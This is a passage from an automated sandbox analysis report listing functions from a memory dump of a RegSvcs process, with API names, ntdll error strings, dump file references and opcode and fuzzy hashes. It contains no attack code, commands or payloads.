                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                              • API String ID: 3446177414-576511823
                                                              • Opcode ID: 6c1ef91602b727c5c3aba7b71f0fef446d089d4af9c1ce3365f60d9702f143e5
                                                              • Instruction ID: bb76f02e8be70a880a37f9a7ea3869e72764814b7e262fbe9bc8c7388ddf04fe
                                                              • Opcode Fuzzy Hash: 6c1ef91602b727c5c3aba7b71f0fef446d089d4af9c1ce3365f60d9702f143e5
                                                              • Instruction Fuzzy Hash: 1AE1C3726083528FDB21CF58D480B6BBBE5BF4831CF444A6EE9958B391D771E984CB42
                                                              Function 0140B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                              • Instruction ID: bf3a9544959f8e46695f379e45b07e42938a691d98b4a78b1f7fa165ded2c53e
                                                              • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                              • Instruction Fuzzy Hash: B681C238E012498EEF2B8E6EC8507BE7BB1EF95310F18453BD851A73F1C63489418B59
                                                              Function 013C9126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $$@
                                                              • API String ID: 3446177414-1194432280
                                                              • Opcode ID: 6016a1390820768e0b32c419ef5a4edc08fb70d0c936f1fb39891bc672f6f488
                                                              • Instruction ID: f7c1838f3a699836aeeeb315a002529005520859321a142c3b2ff635a95d96d3
                                                              • Opcode Fuzzy Hash: 6016a1390820768e0b32c419ef5a4edc08fb70d0c936f1fb39891bc672f6f488
                                                              • Instruction Fuzzy Hash: E1811B72D002699BDB35CB54CC45BEABBB8AB48714F0141EAEA19B7290D7705E85CFA0
                                                              Function 013ED7B0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 151timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlDebugPrintTimes.NTDLL ref: 013ED959
                                                                • Part of subcall function 013C4859: RtlDebugPrintTimes.NTDLL ref: 013C48F7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $$$$p/$*
                                                              • API String ID: 3446177414-332567944
                                                              • Opcode ID: 71ea46af60c30043f6bfddf1f1d91a214f454f3c862dac5a91ef35e45fd35b6b
                                                              • Instruction ID: a28dd4751a52192f403739799838c0b08b73f6380f85ec6c61decd4ff7c5c8e3
                                                              • Opcode Fuzzy Hash: 71ea46af60c30043f6bfddf1f1d91a214f454f3c862dac5a91ef35e45fd35b6b
                                                              • Instruction Fuzzy Hash: 7F510171A0035A9FDB24DFA8D88879EBFF1BF44308F144119D9056B2E1C770A882CB90
                                                              Function 01404960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: 0Ivw$0Ivw$0Ivw$X
                                                              • API String ID: 3446177414-3775388739
                                                              • Opcode ID: 9d56f9629920bd1570f474d1e05fbf1a8e49a60a0d4f9b716a364496dfa13431
                                                              • Instruction ID: 817b734881c72a8521064f63ff4f8330f044f0b1edfef3001f8d649d480a4e9e
                                                              • Opcode Fuzzy Hash: 9d56f9629920bd1570f474d1e05fbf1a8e49a60a0d4f9b716a364496dfa13431
                                                              • Instruction Fuzzy Hash: 9231D87190120AEBDF63DF6AD880B8E3B71AB49348F08402EFF04562B1D3748A90DF95
                                                              Function 013EDB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                              • API String ID: 3446177414-56086060
                                                              • Opcode ID: 7df63c0d0f57e71e78d87445495001a11a0b21da7146cc7e3ad49ddd37dbb85f
                                                              • Instruction ID: 868ea1a8c316f31e69991e68f57bfcb0e1611fb632ff39910a2828637f95f834
                                                              • Opcode Fuzzy Hash: 7df63c0d0f57e71e78d87445495001a11a0b21da7146cc7e3ad49ddd37dbb85f
                                                              • Instruction Fuzzy Hash: 91412330A10766DFDB22DB68C488BAAB7F4EF40728F54416AD50547BE1DB74A8C5CB90
                                                              Function 01444755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01444899
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01444888
                                                              • LdrpCheckRedirection, xrefs: 0144488F
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 3446177414-3154609507
                                                              • Opcode ID: a37d256fe56009834a9274d51b6f2d9bbc0bd3242952dd10eb8695c5e17ac180
                                                              • Instruction ID: b0b33e52d8f0e66ef4cded7ccab6e0fc4fa2893cfaf270fa4ffa668f96148f89
                                                              • Opcode Fuzzy Hash: a37d256fe56009834a9274d51b6f2d9bbc0bd3242952dd10eb8695c5e17ac180
                                                              • Instruction Fuzzy Hash: 2741D136A006519BFB21CE29D841B27BBE4AF49A50B09055FED48E7372E730D801CB91
                                                              Function 013EDBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                              • API String ID: 3446177414-3526935505
                                                              • Opcode ID: 47fd089888dc15dfa9cb4d73d87e177c51fe408e5288770fd70fa78e0b5f404f
                                                              • Instruction ID: 81425e47137d9d9a9b1cc993c77b4bbc1d9dcd652c9783f9858ebb2addce1a7f
                                                              • Opcode Fuzzy Hash: 47fd089888dc15dfa9cb4d73d87e177c51fe408e5288770fd70fa78e0b5f404f
                                                              • Instruction Fuzzy Hash: 05312931114794DFEB26DB6DC449BAAB7F8EF01B58F44405AE44287BA2CBB4A8C4C751
                                                              Function 013BC070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $
                                                              • API String ID: 3446177414-3993045852
                                                              • Opcode ID: 05150c7c6ddf70d92a0298c4c9e30761806a44b9a8bdf2bdcc2f5ff85d070153
                                                              • Instruction ID: a46094497d91890486df6f439fda77b20190e1d09fdde0d86236bbbdf2806d43
                                                              • Opcode Fuzzy Hash: 05150c7c6ddf70d92a0298c4c9e30761806a44b9a8bdf2bdcc2f5ff85d070153
                                                              • Instruction Fuzzy Hash: 5711A172A00219EFDF15AF94E848A9D7B71FF44320F10891AF92A672F4CB315A00CF40
                                                              Function 013EEF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3cd67b15da0a6f78da7174f4b596c5178b3aec1046606e4cb47602dbcdf58f9c
                                                              • Instruction ID: f1d6226c3d80c73dfb90ea26747d5ee03bec8407f681692dfd5aeace068841a6
                                                              • Opcode Fuzzy Hash: 3cd67b15da0a6f78da7174f4b596c5178b3aec1046606e4cb47602dbcdf58f9c
                                                              • Instruction Fuzzy Hash: A9E11275D00728CFCB25CFA9D988A9DBBF9BF48308F24452AE546A72A1D770A941CF10
                                                              Function 0143EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 56561f768ea42a90f5e02425c762e68c2b9d4d82cbca678b803f855d3fb280dd
                                                              • Instruction ID: 8a3f9bb64699514204814b377fa873457e764ae55b67a45f350345ca5a1aac8b
                                                              • Opcode Fuzzy Hash: 56561f768ea42a90f5e02425c762e68c2b9d4d82cbca678b803f855d3fb280dd
                                                              • Instruction Fuzzy Hash: 67713671E0021AAFDF05CFA8D984ADDBBB5BF88314F14402AEA05FB264D734A909CF51
                                                              Function 0143F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: f2698cdf9805bdd93fe869ed8bf447b10f21b5cbc39b14d47dc6569b0a670558
                                                              • Instruction ID: 35cf2de0170d32acfced2a53e3a8d33ed316824f4ab8b3a04621a4934fe18f86
                                                              • Opcode Fuzzy Hash: f2698cdf9805bdd93fe869ed8bf447b10f21b5cbc39b14d47dc6569b0a670558
                                                              • Instruction Fuzzy Hash: 55514675E00219DFEF08CF98D8446DDBBB5BF88314F14802AE915BB260D7349909CF55
                                                              Function 013F7B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                              • String ID:
                                                              • API String ID: 4281723722-0
                                                              • Opcode ID: b55d6f0d95fd2f29fe5c9185b731b972e74588766c135d8836338b1dee0b7e42
                                                              • Instruction ID: e2221ab2c373acf0c98517bcaa60d5e8ca5c843901de0b853c2db525b2c79d23
                                                              • Opcode Fuzzy Hash: b55d6f0d95fd2f29fe5c9185b731b972e74588766c135d8836338b1dee0b7e42
                                                              • Instruction Fuzzy Hash: C1312371E00619AFCF21EFA9E884A9EBBF0FB58720F24412AE511B73A4CB355901CF54
                                                              Function 013C59C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: 5b3ff599d914bcb2e2671d7fa70aa094268a0aaa6ccc2f8d52a93d296b046179
                                                              • Instruction ID: 7669140cacee43de49f3e5733feee13b9abe0ea2624f217bd2d0636c0d453975
                                                              • Opcode Fuzzy Hash: 5b3ff599d914bcb2e2671d7fa70aa094268a0aaa6ccc2f8d52a93d296b046179
                                                              • Instruction Fuzzy Hash: 09324870E0426ADFDB25CF68C884BE9BBB4BB18708F0081EED549A7651D7746E84CF91
                                                              Function 01407D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                              • Instruction ID: aeedf965bfa74229ea473a4f71cae366d193c0645b771589983cbcd5cb05b547
                                                              • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                              • Instruction Fuzzy Hash: F291C470E002069ADB26DF6FC8906BFBBA5AF44322F14453FE995A73E0D730AD418752
                                                              Function 013DD02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Bl$l
                                                              • API String ID: 3446177414-208461968
                                                              • Opcode ID: 8fe3e63ecb4fc86332d29b1c1e42e53ceef4bbd2498e3312a7008199733973d2
                                                              • Instruction ID: 6aed121a8accbb512815c65d6b84c3919190e2c89cce86572c608ffd5bae1c84
                                                              • Opcode Fuzzy Hash: 8fe3e63ecb4fc86332d29b1c1e42e53ceef4bbd2498e3312a7008199733973d2
                                                              • Instruction Fuzzy Hash: FDA1D572B003298BEF31DB99D890BAEB7B5BB44308F0540EDD90967291CB74AE85CF51
                                                              Function 01405DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 01405E34
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
